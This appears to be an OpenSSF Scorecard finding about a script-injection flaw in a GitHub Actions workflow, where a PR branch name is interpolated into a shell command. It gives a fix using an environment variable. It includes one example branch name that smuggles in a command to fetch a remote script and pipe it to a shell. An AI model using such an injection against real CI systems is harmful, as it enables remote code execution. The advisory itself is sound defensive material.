Dangerous-Workflow findings — OpenSSF Scorecard
OpenSSF Scorecard flagged this repository for dangerous GitHub Actions workflow patterns (score: 0/10, scan date: 2026-03-31, commit a0865951).
Finding(s)
Warn: script injection with untrusted input ' github.event.pull_request.head.ref ': .github/workflows/promotion-checker.yml:40
github.event.pull_request.head.ref and github.head_ref are PR branch names fully controlled by the PR submitter. Interpolating them directly into a run: shell command allows an attacker to inject arbitrary shell code by naming their branch maliciously (e.g. a"; curl evil.sh | sh; echo ").
How to fix
Pass the value through env: rather than interpolating it directly in the shell expression. The ${{ }} expression is then expanded into an environment variable before the shell starts, and "$HEAD_REF" is expanded by the shell as one quoted string, so the branch name is never parsed as shell code:
# Before (unsafe)
run: some-command ${{ github.event.pull_request.head.ref }}

# After (safe)
env:
  HEAD_REF: ${{ github.event.pull_request.head.ref }}
run: some-command "$HEAD_REF"
References
Identified by internal OpenSSF Scorecard scanning.